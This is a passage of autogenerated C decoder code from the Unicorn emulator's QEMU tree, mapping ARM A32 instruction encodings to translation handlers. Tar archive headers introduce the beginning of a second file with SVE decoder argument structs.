&u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0001.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:431 */ if (trans_SSUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200000: /* ....0110 001..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0010.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:433 */ if (trans_QADD16(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0010.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:435 */ if (trans_QSAX(ctx, &u.f_rrr)) return true; return false; case 0x00000f80: /* ....0110 0010.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:437 */ if (trans_QADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0011.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:440 */ if (trans_SHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0011.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:442 */ if (trans_SHSAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0011.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:444 */ if (trans_SHADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200020: /* ....0110 001..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0010.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:434 */ if (trans_QASX(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0010.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:436 */ if (trans_QSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00000fc0: /* ....0110 0010.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:438 */ if (trans_QSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0011.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:441 */ if (trans_SHASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0011.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:443 */ if (trans_SHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0011.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:445 */ if (trans_SHSUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00800000: /* ....0110 100..... ........ ..01.... */ disas_a32_extract_disas_a32_Fmt_43(ctx, &u.f_pkh, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0110 1000.... ........ ..01.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:470 */ if (trans_PKH(ctx, &u.f_pkh)) return true; return false; } return false; case 0x00800020: /* ....0110 100..... ........ ..11.... */ switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1000.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:484 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_SXTAB16(ctx, &u.f_rrr_rot)) return true; return false; case 0x00000380: /* ....0110 1000.... ......11 1011.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 10) & 0x3) { case 0x3: /* ....0110 1000.... ....1111 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:491 */ if (trans_SEL(ctx, &u.f_rrr)) return true; return false; } return false; } return false; case 0x00a00000: /* ....0110 101..... ........ ..01.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:476 */ disas_a32_extract_sat(ctx, &u.f_sat, insn); if (trans_SSAT(ctx, &u.f_sat)) return true; return false; case 0x00a00020: /* ....0110 101..... ........ ..11.... */ switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1010.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:485 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_SXTAB(ctx, &u.f_rrr_rot)) return true; return false; case 0x00000300: /* ....0110 1010.... ......11 0011.... */ disas_a32_extract_sat16(ctx, &u.f_sat, insn); switch ((insn >> 10) & 0x3) { case 0x3: /* ....0110 1010.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:479 */ if (trans_SSAT16(ctx, &u.f_sat)) return true; return false; } return false; case 0x00100040: /* ....0110 1011.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:486 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_SXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x00100300: /* ....0110 1011.... ......11 0011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 10111111 ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:492 */ if (trans_REV(ctx, &u.f_rr)) return true; return false; } return false; case 0x00100380: /* ....0110 1011.... ......11 1011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 10111111 ....1111 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:493 */ if (trans_REV16(ctx, &u.f_rr)) return true; return false; } return false; } return false; } return false; case 0x00400000: /* ....0110 .1...... ........ ...0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* ....0110 .100.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:286 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0110 .101.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:291 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x2: /* ....0110 .110.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:298 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_STRBT_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x3: /* ....0110 .111.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:300 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_LDRBT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00400010: /* ....0110 .1...... ........ ...1.... */ switch (insn & 0x00a00020) { case 0x00000000: /* ....0110 010..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0101.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:447 */ if (trans_UADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0101.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:449 */ if (trans_USAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0101.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:451 */ if (trans_UADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00000020: /* ....0110 010..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0101.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:448 */ if (trans_UASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0101.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:450 */ if (trans_USUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0101.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:452 */ if (trans_USUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200000: /* ....0110 011..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0110.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:454 */ if (trans_UQADD16(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0110.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:456 */ if (trans_UQSAX(ctx, &u.f_rrr)) return true; return false; case 0x00000f80: /* ....0110 0110.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:458 */ if (trans_UQADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0111.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:461 */ if (trans_UHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0111.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:463 */ if (trans_UHSAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0111.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:465 */ if (trans_UHADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200020: /* ....0110 011..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0110.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:455 */ if (trans_UQASX(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0110.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:457 */ if (trans_UQSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00000fc0: /* ....0110 0110.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:459 */ if (trans_UQSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0111.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:462 */ if (trans_UHASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0111.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:464 */ if (trans_UHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0111.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:466 */ if (trans_UHSUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00800020: /* ....0110 110..... ........ ..11.... */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1100.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:487 */ if (trans_UXTAB16(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x00a00000: /* ....0110 111..... ........ ..01.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:477 */ disas_a32_extract_sat(ctx, &u.f_sat, insn); if (trans_USAT(ctx, &u.f_sat)) return true; return false; case 0x00a00020: /* ....0110 111..... ........ ..11.... */ switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1110.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:488 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_UXTAB(ctx, &u.f_rrr_rot)) return true; return false; case 0x00000300: /* ....0110 1110.... ......11 0011.... */ disas_a32_extract_sat16(ctx, &u.f_sat, insn); switch ((insn >> 10) & 0x3) { case 0x3: /* ....0110 1110.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:480 */ if (trans_USAT16(ctx, &u.f_sat)) return true; return false; } return false; case 0x00100040: /* ....0110 1111.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:489 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_UXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x00100300: /* ....0110 1111.... ......11 0011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 11111111 ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:495 */ if (trans_RBIT(ctx, &u.f_rr)) return true; return false; } return false; case 0x00100380: /* ....0110 1111.... ......11 1011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 11111111 ....1111 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:494 */ if (trans_REVSH(ctx, &u.f_rr)) return true; return false; } return false; } return false; } return false; case 0x01000000: /* ....0111 .0...... ........ ...0.... */ disas_a32_extract_ldst_rs_p1w(ctx, &u.f_ldst_rr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0111 .0.0.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:285 */ if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0111 .0.1.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:290 */ if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x01000010: /* ....0111 .0...... ........ ...1.... */ switch (insn & 0x00a00060) { case 0x00000000: /* ....0111 000..... ........ .001.... */ switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:501 */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); if (trans_SMLAD(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* ....0111 0001.... ........ 0001.... */ disas_a32_extract_rdmn(ctx, &u.f_rrr, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* ....0111 0001.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:506 */ if (trans_SDIV(ctx, &u.f_rrr)) return true; return false; } return false; } return false; case 0x00000020: /* ....0111 000..... ........ .011.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:502 */ if (trans_SMLADX(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000040: /* ....0111 000..... ........ .101.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:503 */ if (trans_SMLSD(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000060: /* ....0111 000..... ........ .111.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0000.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:504 */ if (trans_SMLSDX(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00200000: /* ....0111 001..... ........ .001.... */ disas_a32_extract_rdmn(ctx, &u.f_rrr, insn); switch (insn & 0x0010f080) { case 0x0010f000: /* ....0111 0011.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:507 */ if (trans_UDIV(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00800000: /* ....0111 100..... ........ .001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 1000.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:409 */ if (trans_USADA8(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00a00040: /* ....0111 101..... ........ .101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:414 */ disas_a32_extract_bfx(ctx, &u.f_bfx, insn); if (trans_SBFX(ctx, &u.f_bfx)) return true; return false; } return false; case 0x01400000: /* ....0111 .1...... ........ ...0.... */ disas_a32_extract_ldst_rs_p1w(ctx, &u.f_ldst_rr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0111 .1.0.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:287 */ if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0111 .1.1.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:292 */ if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x01400010: /* ....0111 .1...... ........ ...1.... */ switch (insn & 0x00a00060) { case 0x00000000: /* ....0111 010..... ........ .001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:509 */ if (trans_SMLALD(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* ....0111 0101.... ........ 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:514 */ if (trans_SMMLA(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000020: /* ....0111 010..... ........ .011.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:510 */ if (trans_SMLALDX(ctx, &u.f_rrrr)) return true; return false; case 0x00100000: /* ....0111 0101.... ........ 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:515 */ if (trans_SMMLAR(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000040: /* ....0111 010..... ........ .101.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:511 */ if (trans_SMLSLD(ctx, &u.f_rrrr)) return true; return false; case 0x00100080: /* ....0111 0101.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:516 */ if (trans_SMMLS(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00000060: /* ....0111 010..... ........ .111.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch (insn & 0x00100080) { case 0x00000000: /* ....0111 0100.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:512 */ if (trans_SMLSLDX(ctx, &u.f_rrrr)) return true; return false; case 0x00100080: /* ....0111 0101.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:517 */ if (trans_SMMLSR(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x00800000: /* ....0111 110..... ........ .001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:418 */ disas_a32_extract_disas_a32_Fmt_42(ctx, &u.f_bfi, insn); if (trans_BFCI(ctx, &u.f_bfi)) return true; return false; case 0x00a00040: /* ....0111 111..... ........ .101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:415 */ disas_a32_extract_bfx(ctx, &u.f_bfx, insn); if (trans_UBFX(ctx, &u.f_bfx)) return true; return false; case 0x00a00060: /* ....0111 111..... ........ .111.... */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); switch (insn & 0xf0100080) { case 0xe0100080: /* 11100111 1111.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:422 */ if (trans_UDF(ctx, &u.f_empty)) return true; return false; } return false; } return false; } return false; case 0x4: /* ....100. ........ ........ ........ */ disas_a32_extract_disas_a32_Fmt_48(ctx, &u.f_ldst_block, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....100. ...0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:521 */ if (trans_STM(ctx, &u.f_ldst_block)) return true; return false; case 0x1: /* ....100. ...1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:522 */ if (trans_LDM_a32(ctx, &u.f_ldst_block)) return true; return false; } return false; case 0x5: /* ....101. ........ ........ ........ */ disas_a32_extract_branch(ctx, &u.f_i, insn); switch ((insn >> 24) & 0x1) { case 0x0: /* ....1010 ........ ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:529 */ if (trans_B(ctx, &u.f_i)) return true; return false; case 0x1: /* ....1011 ........ ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:530 */ if (trans_BL(ctx, &u.f_i)) return true; return false; } return false; case 0x7: /* ....111. ........ ........ ........ */ disas_a32_extract_disas_a32_Fmt_50(ctx, &u.f_i, insn); switch ((insn >> 24) & 0x1) { case 0x1: /* ....1111 ........ ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:534 */ if (trans_SVC(ctx, &u.f_i)) return true; return false; } return false; } return false; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-sve.inc.c������������������������������������������������������0000664�0000000�0000000�00000736531�14675241067�0021171�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int esz; int imm1; int imm2; int rd; } arg_disas_sve25; typedef struct { int esz; int imm; int rd; int rm; } arg_disas_sve26; typedef struct { int imm; int rd; } arg_disas_sve27; typedef struct { int rd; int rn; } arg_disas_sve28; typedef struct { int dbm; int rd; } arg_disas_sve29; typedef struct { int esz; int h; int rd; int rn; int u; } arg_disas_sve30; typedef struct { int pg; int rn; } arg_disas_sve31; typedef struct { #ifdef _MSC_VER int dummy; #endif } arg_disas_sve32; typedef struct { int rd; } arg_disas_sve33; typedef struct { int pg; int rd; int s; } arg_disas_sve34; typedef struct { int rn; } arg_disas_sve35; typedef struct { int ne; int rm; int rn; int sf; } arg_disas_sve36; typedef struct { int eq; int esz; int rd; int rm; int rn; int sf; int u; } arg_disas_sve37; typedef struct { int esz; int imm; int rd; } arg_disas_sve38; typedef struct { int ra; int rd; int rm; int rn; int sz; int u; } arg_disas_sve39; typedef struct { int index; int ra; int rd; int rm; int rn; int sz; int u; } arg_disas_sve40; typedef struct { int esz; int pg; int rd; int rm; int rn; int rot; } arg_disas_sve41; typedef struct { int esz; int pg; int ra; int rd; int rm; int rn; int rot; } arg_disas_sve42; typedef struct { int esz; int index; int ra; int rd; int rm; int rn; int rot; } arg_disas_sve43; typedef struct { int esz; int index; int ra; int rd; int rm; int rn; int sub; } arg_disas_sve44; typedef struct { int esz; int index; int rd; int rm; int rn; } arg_disas_sve45; typedef struct { int esz; int imm; int rd; int rm; int rn; } arg_disas_sve46; typedef struct { int rm; } arg_disas_sve47; typedef struct { int d; int esz; int imm; int pat; int rd; int rn; int u; } arg_incdec2_cnt; typedef struct { int d; int esz; int pg; int rd; int rn; int u; } arg_incdec2_pred; typedef struct { int d; int esz; int imm; int pat; int rd; int u; } arg_incdec_cnt; typedef struct { int d; int esz; int pg; int rd; int u; } arg_incdec_pred; typedef struct { int esz; int pat; int rd; int s; } arg_ptrue; typedef struct { int esz; int pg; int rd; int rn; } arg_rpr_esz; typedef struct { int pg; int rd; int rn; int s; } arg_rpr_s; typedef struct { int esz; int imm; int pg; int rd; int rn; } arg_rpri_esz; typedef struct { int esz; int ff; int imm; int msz; int pg; int rd; int rn; int u; } arg_rpri_gather_load; typedef struct { int dtype; int imm; int nreg; int pg; int rd; int rn; } arg_rpri_load; typedef struct { int esz; int imm; int msz; int pg; int rd; int rn; } arg_rpri_scatter_store; typedef struct { int esz; int imm; int msz; int nreg; int pg; int rd; int rn; } arg_rpri_store; typedef struct { int esz; int pg; int rd; int rm; int rn; } arg_rprr_esz; typedef struct { int esz; int ff; int msz; int pg; int rd; int rm; int rn; int scale; int u; int xs; } arg_rprr_gather_load; typedef struct { int dtype; int nreg; int pg; int rd; int rm; int rn; } arg_rprr_load; typedef struct { int pg; int rd; int rm; int rn; int s; } arg_rprr_s; typedef struct { int esz; int msz; int pg; int rd; int rm; int rn; int scale; int xs; } arg_rprr_scatter_store; typedef struct { int esz; int msz; int nreg; int pg; int rd; int rm; int rn; } arg_rprr_store; typedef struct { int esz; int pg; int ra; int rd; int rm; int rn; } arg_rprrr_esz; typedef struct { int dbm; int rd; int rn; } arg_rr_dbm; typedef struct { int esz; int rd; int rn; } arg_rr_esz; typedef struct { int imm; int rd; int rn; } arg_rri; typedef struct { int esz; int imm; int rd; int rn; } arg_rri_esz; typedef struct { int esz; int rd; int rm; int rn; } arg_rrr_esz; typedef struct { int imm; int rd; int rm; int rn; } arg_rrri; typedef arg_rprr_esz arg_ORR_zpzz; static bool trans_ORR_zpzz(DisasContext *ctx, arg_ORR_zpzz *a); typedef arg_rprr_esz arg_EOR_zpzz; static bool trans_EOR_zpzz(DisasContext *ctx, arg_EOR_zpzz *a); typedef arg_rprr_esz arg_AND_zpzz; 